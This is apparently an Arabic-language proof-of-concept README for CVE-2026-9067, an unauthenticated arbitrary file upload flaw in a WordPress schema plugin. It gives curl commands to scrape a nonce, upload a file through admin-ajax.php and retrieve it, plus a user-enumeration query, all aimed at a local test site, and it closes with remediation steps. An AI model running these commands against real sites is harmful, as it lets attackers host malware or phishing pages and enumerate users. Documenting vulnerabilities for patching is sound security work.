POC & Xploit - دليل إثبات المفهوم
توثيق واستغلال للثغرات التي تم العثور عليها في بيئة اختبار أمان ووردبريس.
قائمة الثغرات
| CVE ID | الإضافة | الشدة | النوع | الحالة |
|---|
| CVE-2026-9067 | Schema & Structured Data for WP & AMP | عالية (8.1) | رفع ملف غير مقيد | موثق |
CVE-2026-9067
ملخص سريع
وصف الثغرة
الإضافة Schema & Structured Data for WP & AMP قبل الإصدار 1.60 لم تتحقق من صلاحيات المستخدم في معالجات AJAX لرفع الملفات ولم تتحقق من نوع الملف المرفوع. وهذا يسمح لمهاجم غير مصادق برفع ملفات عشوائية.
التأثير
- استضافة المحتوى: يمكن للمهاجم استضافة محتوى ضار على نطاق الضحية
- استهلاك القرص: رفع ملفات عشوائية قد يستهلك مساحة القرص
- إساءة السمعة: توزيع برمجيات خبيثة، صفحات تصيد من نطاق الضحية
ملاحظة مهمة: نواة WordPress تحظر الملفات القابلة للتنفيذ (.php, .phtml, .html, .svg)، وبالتالي لا يوجد مسار RCE مباشر من هذه الثغرة.
الملفات
CVE-2026-9067/
├── CVE-2026-9067.md # Dokumentasi lengkap (file ini)
├── CVE-2026-9067.py # Python exploit dengan multi-threading
├── CVE-2026-9067.sh # Bash/Shell PoC script
└── CVE-2026-9067_exploit.sh # Alternative Bash PoC
إثبات المفهوم السريع
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)
# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
-F 'action=saswp_rf_form_image_upload' \
-F "saswp_rf_form_nonce=$NONCE" \
-F '[email protected];type=image/png;filename=evil.csv'
# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"
معلومات البيئة
أوامر الاختبار
التحقق من حالة الموقع
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site
التحقق من إصدار الإضافة
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"
تعداد المستخدمين
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'
المعالجة
- ترقية الإضافة: تحديث Schema & Structured Data for WP & AMP إلى الإصدار 1.60 أو أحدث
- تعطيل الإضافة: إذا لم يكن التحديث ممكنًا، قم بتعطيل الإضافة
- التحصين:
- تعيين ثابت
DISALLOW_FILE_MODIFICATIONS
- تعطيل تنفيذ PHP في دليل uploads عبر
.htaccess
- تنفيذ قواعد WAF
المراجع